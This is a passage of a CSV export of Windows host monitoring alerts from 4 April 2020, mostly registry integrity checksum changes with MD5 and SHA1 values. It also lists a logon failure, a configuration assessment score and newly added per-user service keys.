16:12:27.709",8,"Windows Audit Policy changed", +"Apr 4, 2020 @ 16:12:00.191",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '7f7895b6541198159e50203364165ec9' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '7a8c02e89ba494c6cf5eca3c6098625f21e80c37' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 4, 2020 @ 16:12:01.348",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '0b1bbc23c8320ebaa46b388a8da7c6a9' +New md5sum is : '342765c52f3fd7b50e5188adb30a0ede' +Old sha1sum was: '4966aaba620e10c35307a3970fa16720b5b3ee41' +New sha1sum is : '6d803f7cc7de0ae861402e45b8a1442595a4b544' +" +"Apr 4, 2020 @ 16:12:01.519",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: '3f249139b0d337814b631741efaf7513' +New md5sum is : 'f6949813e6b9d992278b95b7f209e047' +Old sha1sum was: 'ca9d4b294b5958cd508120069d9948cb69c6e833' +New sha1sum is : '8db1fc943f83c30b4bc07f1ed394492c392e7722' +" +"Apr 4, 2020 @ 16:12:04.504",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '66b96bd81f9950113fd4425704f7bda3' +New md5sum is : 'b132e65b4963a54ebee91bcab8914621' +Old sha1sum was: '1e83204dc583496e67da65894044bdf1ca0303b1' +New sha1sum is : '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +" +"Apr 4, 2020 @ 16:12:05.198",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '7f7895b6541198159e50203364165ec9' +New md5sum is : '67c10bdce559c177fe0d89a2be194410' +Old sha1sum was: '7a8c02e89ba494c6cf5eca3c6098625f21e80c37' +New sha1sum is : '4bac1afb15742d4fecc03d097a595ea33eed5376' +" +"Apr 4, 2020 @ 16:12:06.442",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a57532e14922dfab247f58c904256054' +New md5sum is : 'a6934418b12b085c34f2dbaa9e9fa7a0' +Old sha1sum was: '73e81b85db6c7311ac6d78473421beead8c2fa85' +New sha1sum is : 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +" +"Apr 4, 2020 @ 16:12:07.254",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '32f49dc9c0bd631f1041000cd529ee12' +New md5sum is : '619d435b1dac461a9b0cfd3b48ee8f37' +Old sha1sum was: '35d438babd0c920262e2ceb9dd730890a06d7f1f' +New sha1sum is : '95d0826303f42e23fada9a211bd9ea71de2d5c51' +" +"Apr 4, 2020 @ 16:12:07.269",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'eebbaeccf2053b4e942904aaec0f7896' +New md5sum is : 'f65ebed619edcfc8fafe21f958215b53' +Old sha1sum was: '9dd858bced21c65aa5319c959b4d2ce392720739' +New sha1sum is : '493297f96d762981a98fbe5f8c5b5782c30b65aa' +" +"Apr 4, 2020 @ 16:12:07.301",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: '729d0877659e4797d3983fddb4576047' +New md5sum is : 'f7ede040f0bd50f2432cce9ba9720243' +Old sha1sum was: '109945df285ffff37e08eaab1d91e55cb59c26c8' +New sha1sum is : '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +" +"Apr 4, 2020 @ 16:12:18.191",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '20aef581d174f76f785f43f44225eb31' +New md5sum is : 'a0df8d6e879d924da3288b2aa0b85114' +Old sha1sum was: '192912dff5c122eb81d0883a93a3ca18c14d8395' +New sha1sum is : '5b3369bb152c26552a26be399f0ea043686a36fe' +" +"Apr 4, 2020 @ 16:12:18.207",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '9caad04c60da0603e243cab89500f32c' +New md5sum is : '93c2f688a68bea92ca0316b543b731f9' +Old sha1sum was: '7750760bf5d77d822ab8a47b63527c18e3deb347' +New sha1sum is : '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +" +"Apr 4, 2020 @ 16:12:19.442",7,"Integrity checksum changed.","File 'HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '822cb403c72a645a692b783c441badfe' +New md5sum is : 'eec716ae7b147d80b2bff4d347692f12' +Old sha1sum was: 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +New sha1sum is : '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +" +"Apr 4, 2020 @ 16:12:19.457",7,"Integrity checksum changed.","File '[x64] HKEY_USERS\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run' checksum changed. +Old md5sum was: '822cb403c72a645a692b783c441badfe' +New md5sum is : 'eec716ae7b147d80b2bff4d347692f12' +Old sha1sum was: 'bf360e08c45c4932bb574c7e442b62cc38e9bd46' +New sha1sum is : '9e2076f20312cd8b816e3b8fe2747d55e17ac1a2' +" +"Apr 4, 2020 @ 16:14:50.123",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '25944595463a586634e109642d89564d' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '015ecdfcfd301c840ba78a390a8f86ae7c746ac6' +" +"Apr 4, 2020 @ 16:14:50.170",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'c07851f8f2e30eb65757347b948170ba' +New md5sum is : '9fc194a140b0be6ac72833e1d35cc295' +Old sha1sum was: '8b3f116aaee6cbd1dd5d8bf234c4f02b0a5c3e60' +New sha1sum is : '7de9c71bb653c36c522898cc0dc54c4f991b8ab8' +" +"Apr 4, 2020 @ 16:16:29.430",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 4, 2020 @ 16:18:07.461",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '25944595463a586634e109642d89564d' +New md5sum is : '59e568d6746d2d88bb098f738db7991a' +Old sha1sum was: '015ecdfcfd301c840ba78a390a8f86ae7c746ac6' +New sha1sum is : '6184f529e3997b812640b91eeb93958f3c47e783' +" +"Apr 4, 2020 @ 16:18:07.493",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '9fc194a140b0be6ac72833e1d35cc295' +New md5sum is : '9185fd36db1bd6118b3e24fbd805cc14' +Old sha1sum was: '7de9c71bb653c36c522898cc0dc54c4f991b8ab8' +New sha1sum is : '8aef298447fc4eb5f04b80caf615863b8f4a2cb2' +" +"Apr 4, 2020 @ 16:18:07.525",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : 'c9ae14228eb75233f46a647bd8ecf266' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : '0b2ed0eebdb55e9c21c0ceda92ca10a1b24cf98f' +" +"Apr 4, 2020 @ 16:18:12.510",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '4da67f451f88e7056f9dba90376776a6' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'f6a4e7b5478cceb18ddc90d64f0fd8ee468eb464' +" +"Apr 4, 2020 @ 16:18:15.415",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '9787acee89ed88dcc39dbb7691eb4dbb' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : 'f8551a156313a24029a46c29cfbdd3232037dc25' +" +"Apr 4, 2020 @ 16:18:22.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '510c4207e7342db8068ac886de23ed23' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'd9d3280a2201092d8978caa389b28d79360992b5' +" +"Apr 4, 2020 @ 16:18:30.228",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 4, 2020 @ 16:18:31.182",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f66ace1e437ff765e5bb1cd2a053108b' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '843ed546a4eabaa4e72e86e2213d9f025b390ff8' +" +"Apr 4, 2020 @ 16:18:31.868",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : 'd38ad2c6b0d7c8c4f04b71f074e963d5' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : 'd06e2d9ef1c3c90b95a9f75b3ece0079e79158f2' +" +"Apr 4, 2020 @ 16:18:34.432",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f66ace1e437ff765e5bb1cd2a053108b' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '843ed546a4eabaa4e72e86e2213d9f025b390ff8' +" +"Apr 4, 2020 @ 16:18:35.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : 'd762591e4370626d72c1cc6d16bee312' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '28f755a9e787435c98285c84f2c0e2744cd68d2a' +" +"Apr 4, 2020 @ 16:18:40.010",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : 'da4f85e20cce8bd73789dedd2af02ea0' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '7a965da944bbb5b71bfc326697eeff0a93a29316' +" +"Apr 4, 2020 @ 16:18:42.697",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'f5c3741ded4afb44c4ec6bdfe584c678' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : '57a3678143fc80206d40c79a27e8510887900131' +" +"Apr 4, 2020 @ 16:18:44.587",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f66ace1e437ff765e5bb1cd2a053108b' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '843ed546a4eabaa4e72e86e2213d9f025b390ff8' +" +"Apr 4, 2020 @ 16:18:51.572",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 4, 2020 @ 16:18:56.072",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '0a11a072fc5a95522aa8ca6087115073' +New md5sum is : 'e7da235d7443b87ea4d5d1ef32857357' +Old sha1sum was: '7afc9a8039fc019833a674d4b24d2aac0c3bec0f' +New sha1sum is : 'c355c6c799dda0b3767d88f9d370687b8dcadb06' +" +"Apr 4, 2020 @ 16:18:56.088",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 4, 2020 @ 16:18:56.150",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules' checksum changed. +Old md5sum was: '7528347030eb2939f7bd7e7c337611a6' +New md5sum is : '967d20a0cc81220ee8b6adb97b4e1849' +Old sha1sum was: '2c1692bd6f429b9f9663e52e47b6e21760563671' +New sha1sum is : '95c2b07c8c10334fd0ea174fac97a010ee7d6069' +" +"Apr 4, 2020 @ 16:18:56.542",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: 'b3d8a6dbf28322bf04b2134bc9036134' +New md5sum is : '7a8fc575d832d0c5eeb4061229401639' +Old sha1sum was: '7c42438e68109c5b3296f5525de081033dbfb763' +New sha1sum is : 'd246f577ebd47911f243e53ec431d5d1daf7604a' +" +"Apr 4, 2020 @ 16:18:58.245",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 4, 2020 @ 16:19:01.760",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. +Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : 'b9c54484acb8fd7d86fe1f5ae0437eec' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : 'f86179bd767dbce11644bc86f37f50a8c6f641cc' +" +"Apr 4, 2020 @ 16:19:05.822",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '4da67f451f88e7056f9dba90376776a6' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'f6a4e7b5478cceb18ddc90d64f0fd8ee468eb464' +" +"Apr 4, 2020 @ 16:19:06.917",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '5d068fc32661972e5679bac200c857e4' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : '3a2a505ea7a54cf41213e78cb4f3effb73b5c183' +" +"Apr 4, 2020 @ 16:19:07.120",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. +Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '65516ff04f2a5ff2357c6826a3aff112' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : '134b952f9d4997633cc8119d4d8f73e9cbe2d5b4' +" +"Apr 4, 2020 @ 16:19:07.869",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '3d820f638437f474d6720f1c4240374c' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : 'd40209cc85fb7d124f799b363577b63b92e4ae03' +" +"Apr 4, 2020 @ 16:19:08.135",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : '4da67f451f88e7056f9dba90376776a6' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : 'f6a4e7b5478cceb18ddc90d64f0fd8ee468eb464' +" +"Apr 4, 2020 @ 16:19:09.509",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : 'e54d8343bc850868b43e4fa8d062daa5' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : '5faa99bf27762d4e2f292d00958e4d94d47a450e' +" +"Apr 4, 2020 @ 16:19:10.244",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '619d435b1dac461a9b0cfd3b48ee8f37' +New md5sum is : '4f49d27ac0de2bea2feb85b2caf49c7f' +Old sha1sum was: '95d0826303f42e23fada9a211bd9ea71de2d5c51' +New sha1sum is : '3198f8ed333450aa4be21ed1f640fb9cfe511aa0' +" +"Apr 4, 2020 @ 16:19:10.275",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'f65ebed619edcfc8fafe21f958215b53' +New md5sum is : '27d574b090055971b30f9847a86f1b99' +Old sha1sum was: '493297f96d762981a98fbe5f8c5b5782c30b65aa' +New sha1sum is : 'd55221c113fd40276e15c43c6c761b49af64643d' +" +"Apr 4, 2020 @ 16:19:10.323",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 4, 2020 @ 16:19:20.823",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '66412b599c9052ba1a1c9e08b7abbe7c' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '9268e8b2e326583f233d96d8b6fe32e48969274e' +" +"Apr 4, 2020 @ 16:19:20.854",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : '78e6332dc13f45b431b234040dc6c45a' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : 'c71a1f75575f97e8ce9571f3ba2fd1e8c4b53f28' +" +"Apr 4, 2020 @ 16:15:14.767",5,"WSearch was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:15:14.781",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:16:30.212",5,"SessionEnv was unavailable to handle a notification event", +"Apr 4, 2020 @ 16:16:40.633",5,"Logon Failure - Unknown user or bad password", +"Apr 4, 2020 @ 16:16:41.804",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:16:42.073",5,"License Activation (slui.exe) failed", +"Apr 4, 2020 @ 16:16:45.290",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 4, 2020 @ 16:18:04.650",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:04.681",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:07.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:07.884",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:08.664",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:08.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:18:08.696",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\1' was added. +" +"Apr 4, 2020 @ 16:18:08.711",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\2' was added. +" +"Apr 4, 2020 @ 16:18:08.727",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\3' was added. +" +"Apr 4, 2020 @ 16:18:08.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e\TriggerInfo\4' was added. +" +"Apr 4, 2020 @ 16:18:08.774",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:10.993",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:11.024",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:11.103",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:11.118",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:11.337",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:11.352",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:12.665",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:12.681",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:12.852",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:12.868",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:13.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:13.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:13.759",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:13.775",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:13.837",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:13.852",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:39.809",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:39.839",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29f1e\TriggerInfo\0' was added. +" +"Apr 4, 2020 @ 16:18:39.856",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:47.150",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:47.166",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:49.024",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:49.041",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:18:49.603",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:18:49.619",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_29f1e' was added. +" +"Apr 4, 2020 @ 16:19:06.358",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_29f1e\Security' was added. +" +"Apr 4, 2020 @ 16:19:06.390",5,"File added to the 